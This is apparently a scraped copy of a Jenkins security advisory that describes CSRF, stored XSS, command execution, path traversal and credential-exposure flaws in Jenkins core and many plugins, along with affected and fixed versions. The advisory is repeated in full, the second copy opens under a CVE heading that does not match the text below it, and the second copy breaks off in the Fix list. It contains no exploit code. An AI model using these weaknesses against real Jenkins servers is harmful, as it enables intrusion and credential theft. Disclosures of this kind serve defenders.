Jenkins HashiCorp Vault Plugin 3.7.0 and earlier does not mask Vault credentials in Pipeline build logs or in Pipeline step descriptions when Pipeline: Groovy Plugin 2.85 or later is installed.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Jenkins (core)
*   Active Directory Plugin
*   Badge Plugin
*   batch task Plugin
*   Bitbucket Branch Source Plugin
*   Configuration as Code Plugin
*   Conjur Secrets Plugin
*   Credentials Binding Plugin
*   Debian Package Builder Plugin
*   Docker Commons Plugin
*   HashiCorp Vault Plugin
*   Mailer Plugin
*   Matrix Project Plugin
*   Metrics Plugin
*   Publish Over SSH Plugin
*   SSH Agent Plugin
*   Warnings Plugin

**Descriptions****CSRF vulnerability in build triggers**

**SECURITY-2558 / CVE-2022-20612**  
**Severity (CVSS):** Medium  
**Description:**

Jenkins 2.329 and earlier, LTS 2.319.1 and earlier does not require POST requests for the HTTP endpoint handling manual build requests when no security realm is set, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to trigger build of job without parameters.

Jenkins 2.330, LTS 2.319.2 requires POST requests for the affected HTTP endpoint.

**CSRF vulnerability and missing permission checks in Mailer Plugin**

**SECURITY-2163 / CVE-2022-20613 (CSRF), CVE-2022-20614 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: mailer**  
**Description:**

Mailer Plugin 391.ve4a\_38c1b\_cf4b\_ and earlier does not perform a permission check in a method implementing form validation.

This allows attackers with Overall/Read access to use the DNS used by the Jenkins instance to resolve an attacker-specified hostname.

Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

Mailer Plugin 408.vd726a\_1130320 requires POST requests and Overall/Administer permission for the affected form validation method.

**Stored XSS vulnerability in Matrix Project Plugin**

**SECURITY-2017 / CVE-2022-20615**  
**Severity (CVSS):** High  
**Affected plugin: matrix-project**  
**Description:**

Matrix Project Plugin 1.19 and earlier does not escape HTML metacharacters in node and label names, and label descriptions.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Agent/Configure permission.

Matrix Project Plugin 1.20 escapes HTML metacharacters in node and label names, and label descriptions.

**Missing permission check in Credentials Binding Plugin allows validating secret file credentials IDs**

**SECURITY-2342 / CVE-2022-20616**  
**Severity (CVSS):** Low  
**Affected plugin: credentials-binding**  
**Description:**

Credentials Binding Plugin 1.27 and earlier does not perform a permission check in a method implementing form validation.

This allows attackers with Overall/Read access to validate if a credential ID refers to a secret file credential and whether it’s a zip file.

Credentials Binding Plugin 1.27.1 performs permission checks when validating secret file credentials IDs.

**OS command execution vulnerability in Docker Commons Plugin**

**SECURITY-1878 / CVE-2022-20617**  
**Severity (CVSS):** High  
**Affected plugin: docker-commons**  
**Description:**

Docker Commons Plugin 1.17 and earlier does not sanitize the name of an image or a tag.

This results in an OS command execution vulnerability exploitable by attackers with Item/Configure permission or able to control the contents of a previously configured job’s SCM repository.

Docker Commons Plugin 1.18 sanitizes the name of an image or a tag.

**Missing permission checks in Bitbucket Branch Source Plugin allow enumerating credentials IDs**

**SECURITY-2033 / CVE-2022-20618**  
**Severity (CVSS):** Medium  
**Affected plugin: cloudbees-bitbucket-branch-source**  
**Description:**

Bitbucket Branch Source Plugin 737.vdf9dc06105be and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read access to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.

An enumeration of credentials IDs in Bitbucket Branch Source Plugin 746.v350d2781c184 requires the appropriate permissions.

**CSRF vulnerability in Bitbucket Branch Source Plugin allows capturing credentials**

**SECURITY-2467 / CVE-2022-20619**  
**Severity (CVSS):** High  
**Affected plugin: cloudbees-bitbucket-branch-source**  
**Description:**

Bitbucket Branch Source Plugin 737.vdf9dc06105be and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.

This allows attackers with Overall/Read access to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Bitbucket Branch Source Plugin 746.v350d2781c184 requires POST requests for the affected HTTP endpoint.

**Missing permission checks in SSH Agent Plugin allow enumerating credentials IDs**

**SECURITY-2189 / CVE-2022-20620**  
**Severity (CVSS):** Medium  
**Affected plugin: ssh-agent**  
**Description:**

SSH Agent Plugin 1.23 and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read access to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.

An enumeration of credentials IDs in SSH Agent Plugin 1.23.2 requires the appropriate permissions.

**Access key stored in plain text by Metrics Plugin**

**SECURITY-1624 / CVE-2022-20621**  
**Severity (CVSS):** Low  
**Affected plugin: metrics**  
**Description:**

Metrics Plugin 4.0.2.8 and earlier stores access keys unencrypted in its global configuration file jenkins.metrics.api.MetricsAccessKey.xml on the Jenkins controller as part of its configuration.

This access key can be viewed by users with access to the Jenkins controller file system.

Metrics Plugin 4.0.2.8.1 stores access key encrypted once its configuration is saved again.

Additionally, the token value is only displayed once when it is generated.

**User passwords transmitted in plain text by Active Directory Plugin**

**SECURITY-1389 / CVE-2022-23105**  
**Severity (CVSS):** Medium  
**Affected plugin: active-directory**  
**Description:**

Active Directory Plugin implements two separate modes: integration with ADSI on Windows, and an OS agnostic LDAP-based mode.

Active Directory Plugin 2.25 and earlier does not encrypt the transmission of data between the Jenkins controller and Active Directory servers unless it is configured to use the OS agnostic LDAP mode and the system property hudson.plugins.active_directory.ActiveDirectorySecurityRealm.forceLdaps is set to true.

This allows attackers able to capture network traffic between the Jenkins controller and Active Directory servers to obtain credentials of users logging into Jenkins, as well as credentials of the manager DN (LDAP mode) or the Windows/Active Directory user Jenkins is running as (ADSI mode).

Active Directory Plugin 2.25.1 adds an option to only connect to Active Directory via TLS/SSL to both modes (ADSI and LDAP). This option is enabled by default for new installations and is now the recommended way to enforce TLS/SSL for connections to Active Directory. Unlike the existing StartTLS option for the LDAP-based mode, it will not proceed using an insecure connection if establishing a TLS/SSL connection fails.

Administrators upgrading from previous versions of the plugin will be shown a warning on the Jenkins UI requesting they update the plugin configuration unless the (now otherwise obsolete) flag hudson.plugins.active_directory.ActiveDirectorySecurityRealm.forceLdaps was set to true.

The plugin exposes configuration of the ADSI flags implementing the TLS/SSL requirement via the system properties hudson.plugins.active_directory.ActiveDirectoryAuthenticationProvider.ADSI_FLAGS_OVERRIDE and hudson.plugins.active_directory.ActiveDirectoryAuthenticationProvider.ADSI_PASSWORDLESS_FLAGS_OVERRIDE. See the plugin documentation for further details.

Care needs to be taken when reconfiguring the security realm to not accidentally lock yourself out. See the documentation for advice how to resolve this problem if it occurs.

**Non-constant time token comparison in Configuration as Code Plugin**

**SECURITY-2141 / CVE-2022-23106**  
**Severity (CVSS):** Low  
**Affected plugin: configuration-as-code**  
**Description:**

Configuration as Code Plugin 1.55 and earlier does not use a constant-time comparison when checking whether two authentication tokens are equal.

This could potentially allow attackers to use statistical methods to obtain a valid authentication token.

Configuration as Code Plugin 1.55.1 now uses a constant-time comparison when validating authentication tokens.

**Path traversal vulnerability in Warnings Plugin**

**SECURITY-2090 / CVE-2022-23107**  
**Severity (CVSS):** Medium  
**Affected plugin: warnings-ng**  
**Description:**

Warnings Plugin 9.10.2 and earlier does not restrict the name of a file when configuring a custom ID.

This allows attackers with Item/Configure permission to write and read specific files with a hard-coded suffix on the Jenkins controller file system.

Warnings Plugin 9.10.3 checks for the presence of prohibited directory separator characters in the custom ID.

**Stored XSS vulnerability in Badge Plugin**

**SECURITY-2547 / CVE-2022-23108**  
**Severity (CVSS):** High  
**Affected plugin: badge**  
**Description:**

Badge Plugin allows adding custom build badges with a custom description and optionally a link to a URL.

Badge Plugin 1.9 and earlier does not escape the description and does not check for allowed protocols when creating a badge.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

Badge Plugin 1.9.1 escapes the description and check for allowed protocols when creating a badge.

**Improper credentials masking in HashiCorp Vault Plugin**

**SECURITY-2213 / CVE-2022-23109**  
**Severity (CVSS):** Medium  
**Affected plugin: hashicorp-vault-plugin**  
**Description:**

Pipelines display commands executed in their Pipeline step descriptions and their output in build logs. To mask sensitive output, Pipeline: Groovy Plugin 2.84 and earlier specified an allowlist of known non-sensitive variables and masked everything else. This caused problems, so Pipeline: Groovy Plugin 2.85 and newer expects pipeline steps to explicitly specify that variables are to be treated as sensitive and should be removed from output.

HashiCorp Vault Plugin 3.7.0 and earlier relied on the previous behavior and did not explicitly declare variables as sensitive or redacted them.

This can result in exposure of Vault credentials in Pipeline build logs and Pipeline step descriptions.

HashiCorp Vault Plugin 3.8.0 explicitly masks Vault credentials in build logs and Pipeline step descriptions.

This fix only applies to new builds. Administrators are advised to review build logs and Pipeline metadata files created before HashiCorp Vault Plugin 3.8.0 for the presence of Vault credentials.

**Stored XSS vulnerability in Publish Over SSH Plugin**

**SECURITY-2287 / CVE-2022-23110**  
**Severity (CVSS):** Medium  
**Affected plugin: publish-over-ssh**  
**Description:**

Publish Over SSH Plugin 1.22 and earlier does not escape the SSH server name.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Overall/Administer permission.

**CSRF vulnerability and missing permission checks in Publish Over SSH Plugin**

**SECURITY-2290 / CVE-2022-23111 (CSRF), CVE-2022-23112 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: publish-over-ssh**  
**Description:**

Publish Over SSH Plugin 1.22 and earlier does not perform permission checks in methods implementing connection tests.

This allows attackers with Overall/Read access to connect to an attacker-specified SSH server using attacker-specified credentials.

Additionally, these connection tests methods do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

**Path traversal vulnerability in Publish Over SSH Plugin**

**SECURITY-2307 / CVE-2022-23113**  
**Severity (CVSS):** Medium  
**Affected plugin: publish-over-ssh**  
**Description:**

Publish Over SSH Plugin 1.22 and earlier performs a validation of the file name specifying whether it is present or not.

This results in a path traversal vulnerability allowing attackers with Item/Configure permission to discover the name of the Jenkins controller files.

**Password stored in plain text by Publish Over SSH Plugin**

**SECURITY-2291 / CVE-2022-23114**  
**Severity (CVSS):** Low  
**Affected plugin: publish-over-ssh**  
**Description:**

Publish Over SSH Plugin 1.22 and earlier stores password unencrypted in its global configuration file jenkins.plugins.publish_over_ssh.BapSshPublisherPlugin.xml on the Jenkins controller as part of its configuration.

This password can be viewed by users with access to the Jenkins controller file system.

**CSRF vulnerability in batch task Plugin**

**SECURITY-1025 / CVE-2022-23115**  
**Severity (CVSS):** Medium  
**Affected plugin: batch-task**  
**Description:**

batch task Plugin 1.19 and earlier does not require POST requests for several HTTP endpoints, resulting in cross-site request forgery (CSRF) vulnerabilities.

These vulnerabilities allow attackers with Overall/Read access to retrieve logs, build or delete a batch task.

**Agent-to-controller security bypass in Conjur Secrets Plugin allows decrypting secrets**

**SECURITY-2522 (1) / CVE-2022-23116**  
**Severity (CVSS):** Medium  
**Affected plugin: conjur-credentials**  
**Description:**

Conjur Secrets Plugin 1.0.9 and earlier implements functionality that allows agent processes to obtain the plain text of any attacker-provided encrypted secret.

This allows attackers able to control agent processes to decrypt secrets stored in Jenkins obtained through another method.

**Agent-to-controller security bypass in Conjur Secrets Plugin allows retrieving all credentials**

**SECURITY-2522 (2) / CVE-2022-23117**  
**Severity (CVSS):** Medium  
**Affected plugin: conjur-credentials**  
**Description:**

Conjur Secrets Plugin 1.0.9 and earlier implements functionality that allows agent processes to obtain all username/password credentials (Credentials Plugin) stored on the Jenkins controller.

This allows attackers able to control agent processes to retrieve those credentials.

**Agent-to-controller security bypass in Debian Package Builder Plugin**

**SECURITY-2546 / CVE-2022-23118**  
**Severity (CVSS):** High  
**Affected plugin: debian-package-builder**  
**Description:**

Debian Package Builder Plugin 1.6.11 and earlier implements functionality that allows agent processes to invoke command-line git at an attacker-specified path on the controller.

This allows attackers able to control agent processes to invoke arbitrary OS commands on the controller.

**Severity**

*   SECURITY-1025: Medium
*   SECURITY-1389: Medium
*   SECURITY-1624: Low
*   SECURITY-1878: High
*   SECURITY-2017: High
*   SECURITY-2033: Medium
*   SECURITY-2090: Medium
*   SECURITY-2141: Low
*   SECURITY-2163: Medium
*   SECURITY-2189: Medium
*   SECURITY-2213: Medium
*   SECURITY-2287: Medium
*   SECURITY-2290: Medium
*   SECURITY-2291: Low
*   SECURITY-2307: Medium
*   SECURITY-2342: Low
*   SECURITY-2467: High
*   SECURITY-2522 (1): Medium
*   SECURITY-2522 (2): Medium
*   SECURITY-2546: High
*   SECURITY-2547: High
*   SECURITY-2558: Medium

**Affected Versions**

*   **Jenkins weekly** up to and including 2.329
*   **Jenkins LTS** up to and including 2.319.1
*   **Active Directory Plugin** up to and including 2.25
*   **Badge Plugin** up to and including 1.9
*   **batch task Plugin** up to and including 1.19
*   **Bitbucket Branch Source Plugin** up to and including 737.vdf9dc06105be
*   **Configuration as Code Plugin** up to and including 1.55
*   **Conjur Secrets Plugin** up to and including 1.0.9
*   **Credentials Binding Plugin** up to and including 1.27
*   **Debian Package Builder Plugin** up to and including 1.6.11
*   **Docker Commons Plugin** up to and including 1.17
*   **HashiCorp Vault Plugin** up to and including 3.7.0
*   **Mailer Plugin** up to and including 391.ve4a\_38c1b\_cf4b\_
*   **Matrix Project Plugin** up to and including 1.19
*   **Metrics Plugin** up to and including 4.0.2.8
*   **Publish Over SSH Plugin** up to and including 1.22
*   **SSH Agent Plugin** up to and including 1.23
*   **Warnings Plugin** up to and including 9.10.2

**Fix**

*   **Jenkins weekly** should be updated to version 2.330
*   **Jenkins LTS** should be updated to version 2.319.2
*   **Active Directory Plugin** should be updated to version 2.25.1
*   **Badge Plugin** should be updated to version 1.9.1
*   **Bitbucket Branch Source Plugin** should be updated to version 746.v350d2781c184
*   **Configuration as Code Plugin** should be updated to version 1.55.1
*   **Credentials Binding Plugin** should be updated to version 1.27.1
*   **Docker Commons Plugin** should be updated to version 1.18
*   **HashiCorp Vault Plugin** should be updated to version 3.8.0
*   **Mailer Plugin** should be updated to version 408.vd726a\_1130320
*   **Matrix Project Plugin** should be updated to version 1.20
*   **Metrics Plugin** should be updated to version 4.0.2.8.1
*   **SSH Agent Plugin** should be updated to version 1.23.2
*   **Warnings Plugin** should be updated to version 9.10.3

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   batch task Plugin
*   Conjur Secrets Plugin
*   Debian Package Builder Plugin
*   Publish Over SSH Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Daniel Beck, CloudBees, Inc.** for SECURITY-2033, SECURITY-2522 (1), SECURITY-2522 (2), SECURITY-2546
*   **Devin Nusbaum, CloudBees, Inc.** for SECURITY-2467
*   **James Nord, CloudBees, Inc.** for SECURITY-2141
*   **Jasen Minton** for SECURITY-2213
*   **Kevin Guerroudj** for SECURITY-2287
*   **Kevin Guerroudj, CloudBees, Inc.** for SECURITY-2547
*   **Kevin Guerroudj, CloudBees, Inc. and Wadeck Follonier, CloudBees, Inc.** for SECURITY-2558
*   **Kevin Guerroudj, Justin Philip and Marc Heyries** for SECURITY-2307
*   **Marc Heyries, Justin Philip and Kevin Guerroudj** for SECURITY-2290, SECURITY-2291
*   **Matt Sicker, CloudBees, Inc.** for SECURITY-2163
*   **Oleg Nenashev** for SECURITY-1025
*   **Tomasz Szuba** for SECURITY-1878
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-2017, SECURITY-2090
*   **Wasin Saengow** for SECURITY-1624

CVE-2022-23109: Jenkins Security Advisory 2022-01-12

Jenkins Credentials Binding Plugin 1.27 and earlier does not perform a permission check in a method implementing form validation, allowing attackers with Overall/Read access to validate if a credential ID refers to a secret file credential and whether it's a zip file.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Jenkins (core)
*   Active Directory Plugin
*   Badge Plugin
*   batch task Plugin
*   Bitbucket Branch Source Plugin
*   Configuration as Code Plugin
*   Conjur Secrets Plugin
*   Credentials Binding Plugin
*   Debian Package Builder Plugin
*   Docker Commons Plugin
*   HashiCorp Vault Plugin
*   Mailer Plugin
*   Matrix Project Plugin
*   Metrics Plugin
*   Publish Over SSH Plugin
*   SSH Agent Plugin
*   Warnings Next Generation Plugin

**Descriptions****CSRF vulnerability in build triggers**

**SECURITY-2558 / CVE-2022-20612**  
**Severity (CVSS):** Medium  
**Description:**

Jenkins 2.329 and earlier, LTS 2.319.1 and earlier does not require POST requests for the HTTP endpoint handling manual build requests when no security realm is set, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to trigger build of job without parameters.

Jenkins 2.330, LTS 2.319.2 requires POST requests for the affected HTTP endpoint.

**CSRF vulnerability and missing permission checks in Mailer Plugin**

**SECURITY-2163 / CVE-2022-20613 (CSRF), CVE-2022-20614 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: mailer**  
**Description:**

Mailer Plugin 391.ve4a\_38c1b\_cf4b\_ and earlier does not perform a permission check in a method implementing form validation.

This allows attackers with Overall/Read access to use the DNS used by the Jenkins instance to resolve an attacker-specified hostname.

Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

Mailer Plugin 408.vd726a\_1130320 requires POST requests and Overall/Administer permission for the affected form validation method.

**Stored XSS vulnerability in Matrix Project Plugin**

**SECURITY-2017 / CVE-2022-20615**  
**Severity (CVSS):** High  
**Affected plugin: matrix-project**  
**Description:**

Matrix Project Plugin 1.19 and earlier does not escape HTML metacharacters in node and label names, and label descriptions.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Agent/Configure permission.

Matrix Project Plugin 1.20 escapes HTML metacharacters in node and label names, and label descriptions.

**Missing permission check in Credentials Binding Plugin allows validating secret file credentials IDs**

**SECURITY-2342 / CVE-2022-20616**  
**Severity (CVSS):** Low  
**Affected plugin: credentials-binding**  
**Description:**

Credentials Binding Plugin 1.27 and earlier does not perform a permission check in a method implementing form validation.

This allows attackers with Overall/Read access to validate if a credential ID refers to a secret file credential and whether it’s a zip file.

Credentials Binding Plugin 1.27.1 performs permission checks when validating secret file credentials IDs.

**OS command execution vulnerability in Docker Commons Plugin**

**SECURITY-1878 / CVE-2022-20617**  
**Severity (CVSS):** High  
**Affected plugin: docker-commons**  
**Description:**

Docker Commons Plugin 1.17 and earlier does not sanitize the name of an image or a tag.

This results in an OS command execution vulnerability exploitable by attackers with Item/Configure permission or able to control the contents of a previously configured job’s SCM repository.

Docker Commons Plugin 1.18 sanitizes the name of an image or a tag.

**Missing permission checks in Bitbucket Branch Source Plugin allow enumerating credentials IDs**

**SECURITY-2033 / CVE-2022-20618**  
**Severity (CVSS):** Medium  
**Affected plugin: cloudbees-bitbucket-branch-source**  
**Description:**

Bitbucket Branch Source Plugin 737.vdf9dc06105be and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read access to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.

An enumeration of credentials IDs in Bitbucket Branch Source Plugin 746.v350d2781c184 requires the appropriate permissions.

**CSRF vulnerability in Bitbucket Branch Source Plugin allows capturing credentials**

**SECURITY-2467 / CVE-2022-20619**  
**Severity (CVSS):** High  
**Affected plugin: cloudbees-bitbucket-branch-source**  
**Description:**

Bitbucket Branch Source Plugin 737.vdf9dc06105be and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.

This allows attackers with Overall/Read access to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Bitbucket Branch Source Plugin 746.v350d2781c184 requires POST requests for the affected HTTP endpoint.

**Missing permission checks in SSH Agent Plugin allow enumerating credentials IDs**

**SECURITY-2189 / CVE-2022-20620**  
**Severity (CVSS):** Medium  
**Affected plugin: ssh-agent**  
**Description:**

SSH Agent Plugin 1.23 and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read access to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.

An enumeration of credentials IDs in SSH Agent Plugin 1.23.2 requires the appropriate permissions.

**Access key stored in plain text by Metrics Plugin**

**SECURITY-1624 / CVE-2022-20621**  
**Severity (CVSS):** Low  
**Affected plugin: metrics**  
**Description:**

Metrics Plugin 4.0.2.8 and earlier stores access keys unencrypted in its global configuration file jenkins.metrics.api.MetricsAccessKey.xml on the Jenkins controller as part of its configuration.

This access key can be viewed by users with access to the Jenkins controller file system.

Metrics Plugin 4.0.2.8.1 stores access key encrypted once its configuration is saved again.

Additionally, the token value is only displayed once when it is generated.

**User passwords transmitted in plain text by Active Directory Plugin**

**SECURITY-1389 / CVE-2022-23105**  
**Severity (CVSS):** Medium  
**Affected plugin: active-directory**  
**Description:**

Active Directory Plugin implements two separate modes: integration with ADSI on Windows, and an OS agnostic LDAP-based mode.

Active Directory Plugin 2.25 and earlier does not encrypt the transmission of data between the Jenkins controller and Active Directory servers unless it is configured to use the OS agnostic LDAP mode and the system property hudson.plugins.active_directory.ActiveDirectorySecurityRealm.forceLdaps is set to true.

This allows attackers able to capture network traffic between the Jenkins controller and Active Directory servers to obtain credentials of users logging into Jenkins, as well as credentials of the manager DN (LDAP mode) or the Windows/Active Directory user Jenkins is running as (ADSI mode).

Active Directory Plugin 2.25.1 adds an option to only connect to Active Directory via TLS/SSL to both modes (ADSI and LDAP). This option is enabled by default for new installations and is now the recommended way to enforce TLS/SSL for connections to Active Directory. Unlike the existing StartTLS option for the LDAP-based mode, it will not proceed using an insecure connection if establishing a TLS/SSL connection fails.

Administrators upgrading from previous versions of the plugin will be shown a warning on the Jenkins UI requesting they update the plugin configuration unless the (now otherwise obsolete) flag hudson.plugins.active_directory.ActiveDirectorySecurityRealm.forceLdaps was set to true.

The plugin exposes configuration of the ADSI flags implementing the TLS/SSL requirement via the system properties hudson.plugins.active_directory.ActiveDirectoryAuthenticationProvider.ADSI_FLAGS_OVERRIDE and hudson.plugins.active_directory.ActiveDirectoryAuthenticationProvider.ADSI_PASSWORDLESS_FLAGS_OVERRIDE. See the plugin documentation for further details.

Care needs to be taken when reconfiguring the security realm to not accidentally lock yourself out. See the documentation for advice how to resolve this problem if it occurs.

**Non-constant time token comparison in Configuration as Code Plugin**

**SECURITY-2141 / CVE-2022-23106**  
**Severity (CVSS):** Low  
**Affected plugin: configuration-as-code**  
**Description:**

Configuration as Code Plugin 1.55 and earlier does not use a constant-time comparison when checking whether two authentication tokens are equal.

This could potentially allow attackers to use statistical methods to obtain a valid authentication token.

Configuration as Code Plugin 1.55.1 now uses a constant-time comparison when validating authentication tokens.

**Path traversal vulnerability in Warnings Next Generation Plugin**

**SECURITY-2090 / CVE-2022-23107**  
**Severity (CVSS):** Medium  
**Affected plugin: warnings-ng**  
**Description:**

Warnings Next Generation Plugin 9.10.2 and earlier does not restrict the name of a file when configuring a custom ID.

This allows attackers with Item/Configure permission to write and read specific files with a hard-coded suffix on the Jenkins controller file system.

Warnings Next Generation Plugin 9.10.3 checks for the presence of prohibited directory separator characters in the custom ID.

**Stored XSS vulnerability in Badge Plugin**

**SECURITY-2547 / CVE-2022-23108**  
**Severity (CVSS):** High  
**Affected plugin: badge**  
**Description:**

Badge Plugin allows adding custom build badges with a custom description and optionally a link to a URL.

Badge Plugin 1.9 and earlier does not escape the description and does not check for allowed protocols when creating a badge.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

Badge Plugin 1.9.1 escapes the description and check for allowed protocols when creating a badge.

**Improper credentials masking in HashiCorp Vault Plugin**

**SECURITY-2213 / CVE-2022-23109**  
**Severity (CVSS):** Medium  
**Affected plugin: hashicorp-vault-plugin**  
**Description:**

Pipelines display commands executed in their Pipeline step descriptions and their output in build logs. To mask sensitive output, Pipeline: Groovy Plugin 2.84 and earlier specified an allowlist of known non-sensitive variables and masked everything else. This caused problems, so Pipeline: Groovy Plugin 2.85 and newer expects pipeline steps to explicitly specify that variables are to be treated as sensitive and should be removed from output.

HashiCorp Vault Plugin 3.7.0 and earlier relied on the previous behavior and did not explicitly declare variables as sensitive or redacted them.

This can result in exposure of Vault credentials in Pipeline build logs and Pipeline step descriptions.

HashiCorp Vault Plugin 3.8.0 explicitly masks Vault credentials in build logs and Pipeline step descriptions.

This fix only applies to new builds. Administrators are advised to review build logs and Pipeline metadata files created before HashiCorp Vault Plugin 3.8.0 for the presence of Vault credentials.

**Stored XSS vulnerability in Publish Over SSH Plugin**

**SECURITY-2287 / CVE-2022-23110**  
**Severity (CVSS):** Medium  
**Affected plugin: publish-over-ssh**  
**Description:**

Publish Over SSH Plugin 1.22 and earlier does not escape the SSH server name.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Overall/Administer permission.

**CSRF vulnerability and missing permission checks in Publish Over SSH Plugin**

**SECURITY-2290 / CVE-2022-23111 (CSRF), CVE-2022-23112 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: publish-over-ssh**  
**Description:**

Publish Over SSH Plugin 1.22 and earlier does not perform permission checks in methods implementing connection tests.

This allows attackers with Overall/Read access to connect to an attacker-specified SSH server using attacker-specified credentials.

Additionally, these connection tests methods do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

**Path traversal vulnerability in Publish Over SSH Plugin**

**SECURITY-2307 / CVE-2022-23113**  
**Severity (CVSS):** Medium  
**Affected plugin: publish-over-ssh**  
**Description:**

Publish Over SSH Plugin 1.22 and earlier performs a validation of the file name specifying whether it is present or not.

This results in a path traversal vulnerability allowing attackers with Item/Configure permission to discover the name of the Jenkins controller files.

**Password stored in plain text by Publish Over SSH Plugin**

**SECURITY-2291 / CVE-2022-23114**  
**Severity (CVSS):** Low  
**Affected plugin: publish-over-ssh**  
**Description:**

Publish Over SSH Plugin 1.22 and earlier stores password unencrypted in its global configuration file jenkins.plugins.publish_over_ssh.BapSshPublisherPlugin.xml on the Jenkins controller as part of its configuration.

This password can be viewed by users with access to the Jenkins controller file system.

**CSRF vulnerability in batch task Plugin**

**SECURITY-1025 / CVE-2022-23115**  
**Severity (CVSS):** Medium  
**Affected plugin: batch-task**  
**Description:**

batch task Plugin 1.19 and earlier does not require POST requests for several HTTP endpoints, resulting in cross-site request forgery (CSRF) vulnerabilities.

These vulnerabilities allow attackers with Overall/Read access to retrieve logs, build or delete a batch task.

**Agent-to-controller security bypass in Conjur Secrets Plugin allows decrypting secrets**

**SECURITY-2522 (1) / CVE-2022-23116**  
**Severity (CVSS):** Medium  
**Affected plugin: conjur-credentials**  
**Description:**

Conjur Secrets Plugin 1.0.9 and earlier implements functionality that allows agent processes to obtain the plain text of any attacker-provided encrypted secret.

This allows attackers able to control agent processes to decrypt secrets stored in Jenkins obtained through another method.

**Agent-to-controller security bypass in Conjur Secrets Plugin allows retrieving all credentials**

**SECURITY-2522 (2) / CVE-2022-23117**  
**Severity (CVSS):** Medium  
**Affected plugin: conjur-credentials**  
**Description:**

Conjur Secrets Plugin 1.0.9 and earlier implements functionality that allows agent processes to obtain all username/password credentials (Credentials Plugin) stored on the Jenkins controller.

This allows attackers able to control agent processes to retrieve those credentials.

**Agent-to-controller security bypass in Debian Package Builder Plugin**

**SECURITY-2546 / CVE-2022-23118**  
**Severity (CVSS):** High  
**Affected plugin: debian-package-builder**  
**Description:**

Debian Package Builder Plugin 1.6.11 and earlier implements functionality that allows agent processes to invoke command-line git at an attacker-specified path on the controller.

This allows attackers able to control agent processes to invoke arbitrary OS commands on the controller.

**Severity**

*   SECURITY-1025: Medium
*   SECURITY-1389: Medium
*   SECURITY-1624: Low
*   SECURITY-1878: High
*   SECURITY-2017: High
*   SECURITY-2033: Medium
*   SECURITY-2090: Medium
*   SECURITY-2141: Low
*   SECURITY-2163: Medium
*   SECURITY-2189: Medium
*   SECURITY-2213: Medium
*   SECURITY-2287: Medium
*   SECURITY-2290: Medium
*   SECURITY-2291: Low
*   SECURITY-2307: Medium
*   SECURITY-2342: Low
*   SECURITY-2467: High
*   SECURITY-2522 (1): Medium
*   SECURITY-2522 (2): Medium
*   SECURITY-2546: High
*   SECURITY-2547: High
*   SECURITY-2558: Medium

**Affected Versions**

*   Jenkins weekly up to and including 2.329
*   Jenkins LTS up to and including 2.319.1
*   **Active Directory Plugin** up to and including 2.25
*   **Badge Plugin** up to and including 1.9
*   **batch task Plugin** up to and including 1.19
*   **Bitbucket Branch Source Plugin** up to and including 737.vdf9dc06105be
*   **Configuration as Code Plugin** up to and including 1.55
*   **Conjur Secrets Plugin** up to and including 1.0.9
*   **Credentials Binding Plugin** up to and including 1.27
*   **Debian Package Builder Plugin** up to and including 1.6.11
*   **Docker Commons Plugin** up to and including 1.17
*   **HashiCorp Vault Plugin** up to and including 3.7.0
*   **Mailer Plugin** up to and including 391.ve4a\_38c1b\_cf4b\_
*   **Matrix Project Plugin** up to and including 1.19
*   **Metrics Plugin** up to and including 4.0.2.8
*   **Publish Over SSH Plugin** up to and including 1.22
*   **SSH Agent Plugin** up to and including 1.23
*   **Warnings Next Generation Plugin** up to and including 9.10.2

**Fix**

*   Jenkins weekly should be updated to version 2.330
*   Jenkins LTS should be updated to version 2.319.2
*   **Active Directory Plugin** should be updated to version 2.25.1
*   **Badge Plugin** should be updated to version 1.9.1
*   **Bitbucket Branch Source Plugin** should be updated to version 746.v350d2781c184
*   **Configuration as Code Plugin** should be updated to version 1.55.1
*   **Credentials Binding Plugin** should be updated to version 1.27.1
*   **Docker Commons Plugin** should be updated to version 1.18
*   **HashiCorp Vault Plugin** should be updated to version 3.8.0
*   **Mailer Plugin** should be updated to version 408.vd726a\_1130320
*   **Matrix Project Plugin** should be updated to version 1.20
